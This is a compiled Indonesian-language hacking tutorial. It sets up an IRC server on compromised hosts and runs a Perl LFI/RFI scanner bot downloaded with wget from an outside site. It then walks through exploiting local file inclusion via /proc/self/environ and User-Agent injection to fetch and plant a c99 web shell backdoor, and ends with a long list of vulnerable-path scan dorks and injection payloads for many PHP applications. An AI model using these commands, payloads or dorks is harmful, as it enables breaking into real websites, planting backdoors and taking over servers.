How many file descriptors (or sockets) can the IRCd use?
[1024] -> enter
Would you like any more parameters to configure?
Write them here:
[] -> enter

setelah tahapan diatas, akan muncul :
Now all you have to do is type 'make' and let it compile. When that's done, you will receive other instructions on what to do next.

-maka ketik :
[root@reload-x.info/Unreal3.2.8.1] make

proses instalasi akan berjalan, untuk menyempurnakan proses compile ircd, lanjutkan dengan menjalankan perintah :
[root@reload-x.info/Unreal3.2.8.1] make install

- ok, skrg ircd udh selesai, tinggal di run.
- tetapi sebelumnya, edit terlebih dahulu file unrealircd.conf
- Nih kamu download file config nya !

* http://www.cooperativabiosphaera.it/punk/connect.conf
* http://www.cooperativabiosphaera.it/punk/oper.conf
* http://www.cooperativabiosphaera.it/punk/unrealircd.conf
* http://www.cooperativabiosphaera.it/punk/ircd.motd
* http://www.cooperativabiosphaera.it/punk/ircd.log

Edit dulu semua file² nya terus kamu upload ke shells kamu tadi..
- Kamu upload harus di folder / dir Unreal3.2 <--

- baiklah, aku anggap sudah selesai di edit, skrg tinggal jalankan server irc nya :
[root@reload-x.us/Unreal3.2.8.1] ./unreal start

- Sekian -

BOT SCAN LFI

Bikin bot LFI scanner:
aku buat bot lfi nya banyak dalam 1 folder biar u gak capek² upload ke shells, cukup 1x aja :)
nama bot nya a - z

1. Siapkan shell yang support perl <-
2. direktori full write /var/tmp ato /dev/shm
3. wget http://www.rajawalitelevisi.com/tmp.tar.gz
4. tar -zxvf tmp.tar.gz
5. masuk ke Dir / Folder tmp
6. jalankan bot LFI

Command : perl a.txt host port botnick botident botchan yournick fakeproc

Contoh : perl a.txt irc.reload-x.org 6667 botlfi botident reload-x bogel /usr/sbin/httpd

7. tunggu aja bot lfi nya masuk ke server yg u load.
8. klo bot nya udah muncul ketik aja !help di channel.
9. bot lfi siap tempur hahahaha =))

Cara scan bot nya :
ketik di channel : !a buglfi dorklfi
Contoh : !a /index.php?option=com_ccnewsletter&controller= "com_ccnewsletter"

tunggu aja bot nya scan
klo bot nya keluar seperti di bawah ini :

(@Joker)(@GooGLe)(@PHPSheLL) http://lakhrajforgings.com///index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../tmp/shell1657 (@Linux host.dnshorizon2.com 2.6.9-023stab052.4-enterprise #1 SMP Tue May 11 19:40:55 MSD 2010 i686)(@ReLoaD-X)

itu berarti u dapet hasil scan nya :P
buka mozilla u,terus copy paste aja tuh target yg keluar.
Contoh nya gini :

http://lakhrajforgings.com//index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../tmp/shell1657

Copy paste aja di mozilla u.. ntar langsung masuk ke shells inject nya.
ketik : wget http://www.rajawalitelevisi.com/c99.txt -O shells.php
klo udah, jadi target nya ini : http://lakhrajforgings.com/shells.php

- Sekian -

Exploit LFI with Temper Data

Mencari Target LFI
> Sekarang saya akan coba memberikan sample bagaimana cara menemukan target LFI :
example: http://www.target.com/index.php?page=blablabla

> Sekarang kita coba mengganti file setelah ?page= (blablabla) dengan ../
example: http://www.target.com/index.php?page=../

Jika kita mendapatkan pesan error seperti ini:
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1330

website or target tersebut kemungkinan besar can be attack with LFI ;)
untuk memastikan nya kita masuk ke step berikut nya yaitu mencoba meng access file /etc/passwd , for this step Lets make a request:

example: http://www.target.com/index.php?page=../...etc/passwd

jika kita masih mendapat kan pesan error yg sama seperti di atas , berarti kita perlu or coba menambahkan beberapa directory (../../) lagi sampai pesan error hilang dan kita success meng access or menampilkan isi dari file /etc/passwd

contoh kalau sukses akan muncul seperti ini:
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin

Memeriksa apakah proc/self/environ dapat diakses
sekarang mari kita periksa atau check apakah proc/self/environ dapat di access dengan cara mengganti /etc/passwd dengan proc/self/environ.contoh:

http://www.target.com/index.php?page=../...etc/passwd <= change etc/passwd with proc/self/environ

it will be like this: http://www.target.com/index.php?page=../...lf/environ

jika success atau proc/self/environ dapat di access , maka kita akan mendapat pesan seperti berikut:
DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at http://www.website.com Port 80

jika gagal atau blank atau error berarti proc/self/environ tidak dapat di access

NB: kemungkinan lain yg menyebab kan proc/self/environ tidak dapat di access ialah web or target kita menggunakan OS (operating system) FreeBSD

Mengupload code shell injection (backdoor)
Di step ini kita akan mencoba mengupload shell injection (backdoor) kita ke dalam target yg tadi atau target yg proc/self/environ dapat di access.
Bagaimana caranya ?
Di sinilah peran Tamper data di perlukan.Apa itu Tamper Data ?

NB: Tamper data ialah salah satu Add-ons pada browser mozila yg dapat kita gunakan untuk mengganti user agent atau HTTP Header.

Bagaimana cara menggunakan nya , Gmpang
download here : https://addons.mozilla.org/en-US/firefox/addon/966

setelah tamper data di install , buka tamper data dan pada User-Agent masukan command code sebagai berikut:

http://recky.facebookdoom.com/bogel/c99.txt -O shell.php');?>

Command code tersebut akan men-download file c99.txt dari moongchee.com dan otomatis tersimpan dengan nama shell.php.
jika tidak bekerja coba exec () karena sistem () dapat dinonaktifkan pada webserver dari php.ini

Check or Akses shell backdoor kita
Sekarang mari kita periksa apakah script shell (backdoor) kita berhasil atau tersedia pada web target tadi dengan cara membuka:
http://target.com/shell.php
Jika success maka kita akan melihat tampilan backdoor shell kita. Selamat Mencoba.

BUG DORK RFI

!scan /components/com_joomlalib/standalone/stubjambo.php?baseDir= “/index.php?option=com_easybook”
!scan /assets/snippets/reflect/snippet.reflect.php?reflect_base= “/index.php?id=50?
!scan /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a= “Diese Seite wurde mit der quelloffenen Software CMS Made Simple erstellt.”
!scan /members/?INC= “YourWebsitename gives you the best search results and keyword bidding.”
!scan /members/?INC= “If You lost password enter Your login:”
!scan ////////?cmd&file= “index.php?cmd=10?
!scan /include/admin.lib.inc.php?site_path= /list.php?bbs_id=
!scan /components/com_joomlalib/standalone/stubjambo.php?baseDir= “option,com_joomlalib”
!scan /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath= “/plugins/mygallery/”
!scan /skins/advanced/advanced1.php?pluginpath[0]= “/advanced2.php”
!scan /admin/auth.php?xcart_dir= “/pages.php?pageid=3? -p 200
!scan /admin/auth.php?xcart_dir= “/admin/auth.php?xcart_dir=”
!scan /?sourcedir= “/QueryString.php”
!scan /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path= “/board.php?board=”
!scan ?sourcedir= index.php?sourcedir=
!scan /components/com_joomlalib/standalone/stubjambo.php?baseDir= /index.php?option=com_gallery2
!scan /bemarket/postscript/postscript.php?p_mode= /bemarket/
!scan /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a= /index.php?mact= -p 200
!scan /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a= News,cntnt01,detail,0&cntnt01articleid= -p100
!scan /stats.php?dir[func]=&dir[base]= “mygamingladder” “my gaming ladder”
!scan /extras/poll/poll.php?file_newsportal= “/post.php?newsgroups=”
!scan /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= “com_sitemap”
!scan /autoclose.php?subd= “Help Desk Software By Kayako eSupport v3.10.02?
!scan /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act= “/board.php?board=”
!scan /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act= “/kboard.php?board=notice”
!scan /inc/shows.inc.php?cutepath= “Translated by Slaver”
!scan /themes/default/index.php?main= “cfagcms” “cfagcms”
!scan /themes/default/index.php?main= “cfag cms”
!scan /comments.php?id={${include($ddd)}}{${exit()}}&ddd= “poll_ssi.php”
!scan /poll/comments.php?id={${include($ddd)}}{${exit()}}&ddd= “/poll_cookie.php”
!scan /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= “/index.php?option=com_content” xoo
!scan /admin.php?include_path= “Powered by Lazarus Guestbook from carbonize.co.uk”
!scan /classes/Import_MM.class.php?g_rb_basedir= “PHPRecipeBook”
!scan /?sIncPath= “Copyright © 2008 Your Company.”
!scan /?sIncPath= “/index.php?members_mode=”
!scan /?sIncPath= “/index.php?members_mode=top”
!scan /?sIncPath= “index.php?tags_mode=profile”
!scan /common/db.php?commonpath= “playing.php”
!scan /update/update2.php?lang= photokorn 1.53
!scan /index.php?view=page&pagename= “/?view=main&cityid=”
!scan /index.php?view=page&pagename= “You have an error in your SQL syntax;”
!scan /index.php?view=page&pagename= “/?view=selectcity&targetview=post&cityid=-3〈=en”
!scan /index.php?load= “/index.php?load=home”
!scan /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= “/index.php?module=Pagesetter”
!scan /index.php?view=page&pagename= “/?view=main&cityid=”
!scan /index.php?view=page&pagename= “You have an error in your SQL syntax;”
!scan /index.php?view=page&pagename= “/?view=selectcity&targetview=post&cityid=-3〈=en”
!scan /page.php?id= “RCMS-Pro”
!scan /page.php?id= “©2005 – 2006 Roosevelt Purification. RGameScript is a free software under GNU/GPL License”
!scan /page.php?id= “/index.php?id=cats”
!scan /function.inc.php?path= “ACGVclick” “ACGVclick”
!scan /assets/snippets/reflect/snippet.reflect.php?reflect_base= “MODx” “MODx”
!scan /assets/snippets/reflect/snippet.reflect.php?reflect_base= “MODx Parse Error”
!scan /assets/snippets/reflect/snippet.reflect.php?reflect_base= “/index.php?id=5?
!scan /assets/snippets/reflect/snippet.reflect.php?reflect_base= “/index.php?id=1&start=10?
!scan /tools/send_reminders.php?noSet=0&includedir= “WebCalendar v1.1.0c-CVS”
!scan /assets/snippets/reflect/snippet.reflect.php?reflect_base= “snippets/reflect”
!scan /assets/snippets/reflect/snippet.reflect.php?reflect_base= “MODx CMS”
!scan /assets/snippets/reflect/snippet.reflect.php?reflect_base= “My MODx Site is powered by MODx Content Management System”
!scan /index.php?view=page&pagename= “Buy, sell, trade, date, events… post anything”
!scan /index.php?view=page&pagename= “Thank you for stopping by my site. Here you can leave your mark.”
!scan /includes/function_core.php?web_root= “Mp3 Rating”
!scan /?mosConfig_absolute_path= “Powered by Joomla!”
!scan /modules/Forums/admin/admin_words.php?phpbb_root_path= “Hebrew Ver. HebNukeR 2.0 © 2004 by HebNukeR.org. All Rights Reserved”
!scan /index.php?option=com_custompages&cpage= Joomla custompages
!scan /booth.php?include_path= “/poll_cookie.php”
!scan /update/update2.php?lang= “photo foto gallery bilder tauchen wracks galerie”
!scan /header.php?base_folder= “Powered by Bab.stats”
!scan /tools/send_reminders.php?noSet=0&includedir= WebCalendar v1.0RC3 (11 Mar 2005)
!scan /booth.php?include_path= “/poll_cookie.php”
!scan /index.php?cmd&file= “Membre avec photos seulement ?”
!scan /index.php?cmd&file= “%22HOME%22+%22%7C%22+%22UPLOAD+YOUR+PHOTO%22+%22%7C%22+%22LATEST+USERS%22+%22%7C%22+%22TOP+10%22+%22%7C%22+%22TOP+GUYS%22+%22%7C%22+%22TOP+GIRLS%22+%22%7C%22+%22CONTACT%22?
!scan /index.php?cmd&file= “List Users with Pics only?”
!scan /index.php?cmd&file= “So you think you’re HOT?”
!scan /contenido/external/frontend/news.php?cfg[path][includes]= Contenido Login
!scan /contenido/external/frontend/news.php?cfg[path][includes]= “Contenido Login” “Contenido Login”
!scan /clmcpreload.php?CLPATH= “CaLogic” “Calendars”
!scan /txt-db-api/txt-db-api.php?API_HOME_DIR= “linkmix” “linkmix” “linkmix”
!scan /cms/system/openengine.php?oe_classpath= “/cms/website.php?id=/de/”
!scan /modules/Forums/admin/admin_words.php?phpbb_root_path= “Thai Edition by ThaiNuke”
!scan index.php?custompluginfile[]= “Sorry, your account does not have access to submit information”
!scan include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= /index.php?nwaction=shownews
!scan include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= /article.php?article_file=
!scan include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= “Newswriter” “Newswriter”
!scan /modules/coppermine/themes/coppercop/theme.php?THEME_DIR= “coppermine” “coppermine” “coppermine”
!scan /config.inc.php?path_escape= “Your Personal Search Advisor !”
!scan /include/scripts/export_batch.inc.php?DIR= “ModernBill”
!scan /config/config_admin.php?INC= “YourWebsitename gives you the best search results and keyword bidding.”
!scan /config/config_admin.php?INC= %22home%22+%22%7C%22+%22login%22+%22%7C%22+%22add+your+site%22+%22%7C%22+%22affiliate+program%22+%22%7C%22+%22privacy%22+%22%7C%22+%22terms%22
!scan /include/admin.lib.inc.php?site_path= /view.php?bbs_id=
!scan /clmcpreload.php?CLPATH= “© Philip Boone”
!scan components/com_virtuemart/install.php?mosConfig_absolute_path= “powered by VirtueMart”
!scan includes/archive/archive_topic.php?phpbb_root_path= IntegraMOD
!scan components/com_moofaq/includes/file_includer.php?gzip=0&file= "com_moofaq"
!scan /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path= /com_fabrik/
!scan /index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path= /com_fabrik/
!scan /snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir= snippetmaster
!scan ?dir[func]=&dir[base]= "Ladder Scripts"
!scan /accounts/inc/errors.php?error= "Powered By: Merak Mail Server Software"
!scan conf.php?subdir= "wow roster"
!scan /config/config_admin.php?INC= "Keyword" "Add Your Site"
!scan src/admin/pt_upload.php?config_file=[localserverfile]&ptconf[src]=
!scan ?INCLUDE_FOLDER= "e404.php"?*.st"
!scan /?_zb_path= "/bbs/" "/zboard/"
!scan //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= index.php
!scan source/mod/rss/viewitem.php?Codebase= ED Engine
!scan source/mod/rss/channeledit.php?Codebase= WebEd
!scan prepare.php?xcart_dir= "X-CART. Powerful PHP shopping cart software"
!scan /admin/frontpage_right.php?loadadminpage= Copyright � 2007 Agares Media
!scan /index.php?get= inurl”index.php?get=”
!scan /index.php?target= inurl”index.php?target=”
!scan /index.php?_SERVER[DOCUMENT_ROOT]= “powered by Clicknet CMS”
!scan /include/admin.lib.inc.php?site_path= “rgboard
!scan /header.php?base_folder= “Powered by Bab.stats”
!scan /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=& mosConfig_absolute_path= “/index.php?option=com_content”
!scan /admin.php?include_path= “Guestbook”
!scan //main.php?_zb_path= “main.php”
!scan //login.php?_zb_path= “login.php”
!scan /////?_SERVER[DOCUMENT_ROOT]= “/board” site:.kr
!scan /admin.php?include_path= “gastenboek”
!scan /docebo/doceboLms//class/class.dashboard_lms.php?where_framework= “doceboLms”
!scan /encapscms_PATH/core/core.php?root= “encapscms 0.3.6″ “encapscms 0.3.6″
!scan /PNphpBB2/includes/functions_admin.php?phpbb_root_path= “/PNphpBB2/”
!scan /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path= “PHP-NUKE”
!scan /s_loadenv.inc.php?DOCUMENT_ROOT= “netcat require”
!scan /index.php?DOCUMENT_ROOT= “netcat_files”
!scan /ray.3.5/modules/global/inc/content.inc.php?sIncPath= “boonex”
!scan /?page= /?pagedb=?
!scan ?sourcedir= index.php?sourcedir=
!scan /security/include/_class.security.php?PHPSECURITYADMIN_PATH= “web3news”
!scan /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath= “/plugins/sniplets/”
!scan ///////?cmd&file= "List Users with Pics only?"
!scan /assets/snippets/reflect/snippet.reflect.php?reflect_base= /MODx/
!scan /include/scripts/export_batch.inc.php?DIR= ModernBill
!scan /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path= technote7
!scan /?sIncPath= "BoonEx- Community Software"
!scan /parse/parser.php?WN_BASEDIR= WEB//NEWS Personal Newsmanagement
!scan ?custompluginfile[]= index.php?categoryid=5
!scan ?custompluginfile[]= index.php?categoryid=10
!scan ?custompluginfile[]= index.php?categoryid=15
!scan /?installed_config_file= "PhpJobScheduler"
!scan /pjsfiles/modify.php?installed_config_file= "PhpJobScheduler"
!scan errors.php?error= "/com_rwcards" "/com_rwcards"
!scan //vwar/backup/errors.php?error= "errors.php"
!scan errors.php?error= "netcat_files"
!scan /index.php?DOCUMENT_ROOT= "netcat_files"
!scan plugins/safehtml/HTMLSax3.php?dir[plugins]= "powered by boonex"
!scan errors.php?error= "powered by boonex"
!scan ?sourcedir= index.php?sourcedir=
!scan errors.php?error= "/com_ponygallery"
!scan /?page= /?pagedb=?
!scan /?include_path= "guestbook"
!scan /?include_path= "action"+"poll_ident"
!scan /admin/include/lib.module.php?mod_root= "/cmsworks"
!scan errors.php?error= "/com_extcalendar"
!scan errors.php?error= "phpkit" "phpkit"
!scan errors.php?error= "/contenido/includes"
!scan popup.php?path= "phpkit" "phpkit"
!scan errors.php?error= "Subdreamer"
!scan //?custompluginfile%5B%5D= Created by Subdreamer CMS
!scan lostpasswd.php?env[include_prefix]= bookmark4u
!scan /poll/png.php?include_path= "action"+"poll_ident"
!scan /inc/formmail.inc.php?script_root= "Powered By Form Mail Script"
!scan errors.php?error= "powered by TalkBack"
!scan /components/errors.php?error= "com_simpleboard"
!scan /modules/errors.php?error= "/includes/mambo.php"
!scan /errors.php?error= "Joomla Visites"
!scan /modules/Forums/admin/errors.php?error= com_gallery
!scan /include/bbs.lib.inc.php?site_path= "/rgboard/
!scan errors.php?error= "/appserv"
!scan includes/ktedit/toolbar.php?dirDepth= ktmlpro
!scan ?custompluginfile%5B%5D= Subdreamer categoryid
!scan ?custompluginfile%5B%5D= "Website Powered by Subdreamer"
!scan include/lib.inc.php?site_path= rgboard
!scan index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path= "/includes/mambo.php"
!scan index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path= "mambo/index.php"
!scan demo1/auction_confirmation.inc.php/header.php?prefix= browse.php?id=?
!scan phpAdsNew/view.inc.php?phpAds_path= auction/index.php
!scan playing.php/common/db.php?commonpath= inurl:"playing.php"
!scan viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a= "Powered by phpBB 2.0" "Powered by phpBB 2.0"+org "Powered by phpBB 2.0" "Powered by phpBB 2.0"+hk
!scan errors.php?error= "index of" errors.php
!scan index.php?option=com_custompages&cpage= inurl:"com_custompages"
!scan index2.php?option=com_custompages&cpage= inurl:"com_custompages"
!scan mainbody.php?option=com_custompages&cpage= inurl:"com_custompages"
!scan editsite.php?returnpath= "editsite.php"
!scan slice.php3?GLOBALS[AA_INC_PATH]= slice.php3?GLOBALS[AA_INC_PATH]=
!scan files/carprss.php?CarpPath= "by SiteBuilder Elite"
!scan accounts/inc/include.php?language=0&lang_settings[0][1]= "Powered by IceWarp Software Merak Email Server" IceWarp Web Mail 5.4
!scan config.inc.php?path_escape= home "post ad" "post event" "post image"
!scan ipblock.inc.php?path_escape= home "post ad" "post event" "post image"
!scan ipblock.inc.php?path_escape= event(s) today "All Upcoming Events"
!scan ws/login.php?noSet=0&includedir= "Public Access (Login)" WebCalendar
!scan vwar/convert/mvcw.php?step=1&vwar_root= "de/vwar"
!scan protection.php?action=logout&siteurl= "approved by TheFanlistings.org"
!scan ?mosConfig_absolute_path= "Free Software released under the GNU/GPL License"
!scan ?mosConfig_absolute_path= Joomla Template by
!scan plugins/spamx/MassDelete.Admin.class.php?_CONF[path]= "All trademarks and copyrights on this page are owned by their respective owners" Geeklog
!scan plugins/spamx/MailAdmin.Action.class.php?_CONF[path]= "Powered By GeekLog" "Created this page in" seconds
!scan admin.php?include_path= "Teken het gastenboek" Onderhoud
!scan includes/db_connect.php?baseDir= "Version 2.0.4 "You must have cookies enabled in your browser"
!scan bookmark4u/lostpasswd.php?env[include_prefix]= bookmark4u
!scan index.php?a= ".de/index.php?a="
!scan index.php?skin_file= "Powered by Mp3ToolBox
!scan index.php?filename= "35mm Slide Gallery 6.0"
!scan protection.php?action=logout&siteurl= "Members" "The complete list" "view sorted by country" "/members.php?id=all" >> mulai
!scan protection.php?action=logout&siteurl= "/members.php?id=all"
!scan protection.php?action=logout&siteurl= "Members" "The complete list" "view sorted by country" "ID" "Name" "Email" "URL"
!scan accueil.php?menu= "asso.fr/accueil.php?menu="
!scan comments-display-tpl.php?config[comments_form_tpl]= "Powered By TalkBack"
!scan /?file= inurl:?/?file=contact? intext:?About Us? -cfm -asp -index.php -.cgi -aspx mulai
!scan modules/Forums/admin/admin_db_utilities.php?phpbb_root_path= ".php?name=Forums"
!scan modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path= PNphpBB2
!scan plugins/spamx/MassDelete.Admin.class.php/geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]= geeklog
!scan admin.php?include_path= "IP-adres genoteerd" "HTML is"
!scan index.php?strona= "/index.php?strona="
!scan index.php?strona= "/index.php?strona=" site:pl
!scan index1.php?page= "/index1.php?page=
!scan index1.php?page= "/index1.php?page=" ".php"
!scan includes/functions_mod_user.php?phpbb_root_path= phpBBViet
!scan ?mosConfig_absolute_path= "Joomla! is Free Software released under the GNU/GPL License."
!scan ?mosConfig_absolute_path= "Joomla Is"
!scan language/lang_english/lang_main_album.php?phpbb_root_path= "Czech translation by Vitek"
!scan index.php?pg= "Search | Invite | Mail | Blog | Forum" site:mx
!scan administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path= inurl:"com_jjgallery
!scan modules/Neos_Chronos/header.php?base_folder= "Neos_Chronos"
!scan historytemplate.php?cms[support]=1&cms[tngpath]= "powered by The Next Generation of Genealogy Sitebuilding"
!scan includes/messages.inc.php?include_path= messages.inc.php
!scan contact.php?AD_BODY_TEMP= "Not+required+for+reporting+a+file"
!scan includes/db_connect.php?baseDir= "dotProject" "Version" "cookie" site:cn
!scan /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path= /modules/Forums/
!scan contenido/classes/class.inuse.php?cfg[path][contenido]= Contenido Login
!scan includes/db_connect.php?baseDir= "dotProject logo"
!scan index.php?lg= "index.php?lg=" site:be
!scan skin/zero_vote/ask_password.php?dir= zeroboard site:.us
!scan admin.php?include_path= "Total Records:" "HTML code is" "Advanced" site:.com
!scan index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= mambo
!scan admin.php?include_path= "Total Records:" "HTML code is" "Advanced
!scan components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path= com_pollxt
!scan administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path= com_colophon
!scan components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path= com_loudmounth
!scan components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path= com_videodb
!scan components/com_cloner/cloner.php?mosConfig_absolute_path= "joomla"
!scan administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path= com_multibanners
!scan administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site= com_a6mambohelpdesk
!scan components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path= com_mambatstaff
!scan components/com_securityimages/configinsert.php?mosConfig_absolute_path= com_securityimages
!scan components/com_securityimages/lang.php?mosConfig_absolute_path= com_securityimages
!scan components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path= com_artlinks
!scan components/com_galleria/galleria.html.php?mosConfig_absolute_path= com_galleria
!scan administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path= com_mgm
!scan components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path= com_mambatstaff
!scan redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]= inurl:redaxo
!scan admin.php?include_path= Advanced Guestbook 2.3.4
!scan template.php?page= phpBB Group
!scan phpBB2/admin/admin_cash.php?setmodules=1&phpbb_root_path= phpBB Group
!scan forum/admin/admin_cash.php?setmodules=1&phpbb_root_path= phpBB Group
!scan mods/iai/includes/constants.php?phpbb_root_path= phpBB PlusXL
!scan phpBB2-MODificat/includes/functions.php?phpbb_root_path= PHPBB2
!scan includes/bbcb_mg.php?phpbb_root_path= phpBBXS
!scan includes/archive/archive_topic.php?phpbb_root_path= phpbbXtra
!scan modules.php?op=modload&name=Wiki&file=index&pagename= PHP-Wiki
!scan includes/setup.php?phpc_root_path= PHP-Calendar
!scan templates/default/tpl_message.php?right_file= "PHP TopTree BBS"
!scan config.php?fullpath= "PHP TopSites"
!scan auction/email_request.php?user_id= "PHP Surveyor"
!scan modules/projects/index.php?full_path= "PHP Project Management"
!scan xarg_corner.php?xarg= "PHP Image XArg"
!scan screen.php?neurl= "News Evolution"
!scan /_theme/breadcrumb.php?rootBase= new Female Celebrities
!scan show.php?file= "Helplink"
!scan form.php?floap=modfich&do= GenesisTrader
!scan inc/pipe.php?HCL_path= "Help Center Live"
!scan admin/business_inc/saveserver.php?thisdir= confixx
!scan modules/Forums/favorites.php?nuke_bb_root_path= "Powered by Platinum"
!scan /manager/index.php= "Etomite"
!scan /index.php?basePath= "gizzar"
!scan /Index.php?abs_url= "PEGames"
!scan /index.php?page= "3editor CMS"
!scan /index.php?AML_opensite= "AllMyLinks"
!scan /index.php?AMV_openconfig=1&AMV_serverpath= "AllMyVisitors"
!scan /lang/index.php?file= "oreon"
!scan /index.php?gen= "mafia-2-0-0"
!scan /index.php?catid= "CascadianFAQ"
!scan /index.php?rootpath= "DreamStats System"
!scan /index.php?n= "Jupiter CMS"
!scan /index.php?option=news&aktion=komm&ID= "HC NEWSSYSTEM"
!scan /index.php?function=custom&custom= "Shopping Catalog"
!scan /admin/index.php?p= "iPrimal"
!scan /classes/index.php?siteconf= "Lithium"
!scan /Cookie/index.php= "Imageview"
!scan /index.php= "Berty Forum"
!scan /index.php?section= "Jasmine-Web"
!scan /index.php?contentSpecial= "eboli"
!scan /templates/tmpl_dfl/scripts/index.php?dir[inc]= "Boonex Dolphin"
!scan /index.php?page= "tagit2b"
!scan /index.php?catid= "PHP Classifieds"
!scan /search.php?catid_search= "PHP Classifieds"
!scan /p!scan /search.php?catid_search= "PHP Classifieds"
!scan /index.php?file_name[]= "PowerPortal"
!scan /admin/index.php?o= "BrudaGB"
!scan /index.php?gr_1_id= "Eskolar"
!scan /boitenews4/index.php?url_index= "Boite de News"
!scan /index.php?news_include_path= "newsReporter"
!scan /index.php?page= "ClanSys"
!scan /index.php?mod=sondages&do= "PwsPHP"
!scan /appserv/main.php?appserv_root= appserv
!scan solpot.html?body= allinurl: "solpot.html?body"
!scan /config.php?xcart_dir= "X-CART"
!scan /ws/login.php?includedir= WebCalendar
!scan /ws/login.php?includedir= WebCalendar v0.9.45
!scan ocp-103/index.php?req_path= ocPortal
!scan images/evil.php?owned= e107
!scan index.php?module=PostWrap&page= PostNuke PostWrap
!scan mcNews/admin/header.php?skinfile= mcNews
!scan inc/download_center_lite.inc.php?script_root= "Download Center Lite"
!scan zboard/zboard.php?id= Zeroboard
!scan index.php?node=system&op=extop&ext=statman&eop=/visitor&ip= Nodez
!scan include/SQuery/gameSpy2.php?libpath= intitle:"Autonomous LAN party"
!scan event.php?myevent_path= MyEvent
!scan index.php?page= "Internet PhotoShow"
!scan mod/authent.php4?rootpath= RechnungsZentrale
!scan about.php?DFORUM_PATH= dForum
!scan post.php?DFORUM_PATH= dForum
!scan movie_cls.php?full_path= Built2Go
!scan /toplist.php?f=toplist_top10&phpbb_root_path= inurl:"toplist.php" "powered by phpbb"
!scan admin/addentry.php?phpbb_root_path= inurl:guestbook.php "Advanced GuestBook" "powered by phpbb"
!scan /master.php?root_path= inurl:/system/article/alltopics.php
!scan /master.php?root_path= inurl:/system/user/index.php
!scan includes/kb_constants.php?module_root_path= "Powered by Knowledge Base"
!scan /classes/adodbt/sql.php?classes_dir= inurl:"index2.php?option=rss"
!scan /classes/adodbt/sql.php?classes_dir= "powered By Limbo CMS"
!scan /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= "Powered By Aardvark Topsites PHP 4.2.2"
!scan agenda.php3?rootagenda= "Powered by phpMyAgenda"
!scan agenda2.php3?rootagenda= "Powered by phpMyAgenda"
!scan show.php?path= inurl:"fclick.php?"
